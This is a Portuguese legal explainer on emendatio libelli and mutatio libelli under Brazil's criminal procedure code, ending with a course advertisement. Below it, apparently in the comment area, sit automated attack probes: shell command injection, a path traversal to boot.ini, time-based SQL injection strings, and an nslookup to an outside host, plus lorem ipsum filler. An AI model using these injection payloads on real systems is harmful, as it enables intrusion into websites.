Introdução
Tanto a emendatio libelli quanto a mutatio libelli são institutos do processo penal, que se referem ao princípio da correlação entre a imputação e a sentença.
Para garantir esse princípio, a sentença deve ter relação lógica com os fatos narrados na peça acusatória (seja ela queixa ou denúncia), ou seja, o juiz deve julgar de acordo com os fatos narrados pela acusação.
Afinal, foi com base nesses fatos que a defesa se defendeu, e não em outros.
Quando houver alguma discrepâncias no processo, pondo em risco o princípio da correlação entre a imputação e a sentença, o magistrado deve se valer dos artigos 383 ou 384, do Código de Processo Penal (CPP), aplicando, respectivamente, a emendatio libelli ou a mutatio libelli:
Art. 383. O juiz, sem modificar a descrição do fato contida na denúncia ou queixa, poderá atribuir-lhe definição jurídica diversa, ainda que, em conseqüência, tenha de aplicar pena mais grave.
Art. 384. Encerrada a instrução probatória, se entender cabível nova definição jurídica do fato, em conseqüência de prova existente nos autos de elemento ou circunstância da infração penal não contida na acusação, o Ministério Público deverá aditar a denúncia ou queixa, no prazo de 5 (cinco) dias, se em virtude desta houver sido instaurado o processo em crime de ação pública, reduzindo-se a termo o aditamento, quando feito oralmente.

O que é a emendatio libelli?
De acordo com o artigo 383, do Código de Processo Penal, há emendatio libelli, quando o juiz, sem modificar a descrição do fato, que está na denúncia ou queixa, atribui ao caso definição jurídica diversa, mesmo que aplique pena mais grave.
Nesse caso, o Ministério Público ou o querelante não precisam fazer o aditamento, pois o juiz apenas deu definição jurídica diversa aos mesmos fatos descritos na denúncia ou na queixa.
Aqui, os fatos narrados são os mesmos que foram provados.
O que é mutatio libelli?
Na mutatio libelli, prevista no artigo 384, do Código de Processo Penal, o magistrado, por causa das provas, entende ser necessária uma nova definição jurídica do fato. O magistrado entende que os fatos narrados na denúncia ou queixa não correspondem aos fatos provados na instrução criminal.
Os fatos narrados são distintos dos provados. Nesse caso, é necessário o aditamento do Ministério Público ou do querelante.
Nesse, para manter a congruência lógica entre a inicial acusatória e a sentença, faz-se necessário o aditamento do Ministério Público ou do querelante.
Qual a diferença entre a emendatio libelli e a mutatio libelli?
Na emendatio libelli, os fatos narrados são os mesmos que foram provados. Não há a necessidade de aditamento. A previsão legal está no artigo 383, do CPP.
Já na mutatio libelli, os fatos narrados são distintos dos que foram provados. Nesse caso, há a necessidade do aditamento. O artigo 384, do CPP, regula esse instituto.
A emendatio libelli pode ocorrer na ação penal privada e na ação penal pública. No entanto, a mutatio libelli só é possível na ação penal pública.
Conclusão
A emendatio libelli e a mutatio libelli são institutos protetivos do princípio da correlação entre a imputação e a sentença. São instrumentos que até excepcionam esse princípio, mas sem prejudicar o devido processo legal e a ampla defesa.
Neste vídeo, explicamos ambos os institutos de acordo com uma decisão interessante da Quinta Turma do Superior Tribunal de Justiça (STJ):
Gostaria de aprender mais sobre o direito e levar as suas habilidades jurídicas para outro nível?
Ou quer fazer outros cursos incríveis, com temas de criminologia, filosofia, psicologia e muito mais?
Explore os cursos do direito novo: aprenda com interação e inovação.
Combinamos o ensino moderno com recursos de gamificação e aulas cinemáticas.
Os nossos cursos proporcionam uma compreensão do sistema jurídico do princípio ao fim, para que você possa se destacar e fazer a diferença.
Hi there!
a;sleep 60;
Hi there!
http://www.google.fr/?
../../../../../../../../../../boot.iniindex.php
Hi there!
Hi there!
Hi there!
sleep(11)#1
“)) or benchmark(10000000,MD5(1))#1
1)) or benchmark(10000000,MD5(1))#1
“))/**/or/**/pg_sleep(11)–1
Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.
Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.
localhost&nslookup r-18703-2110.bgle.0b.vc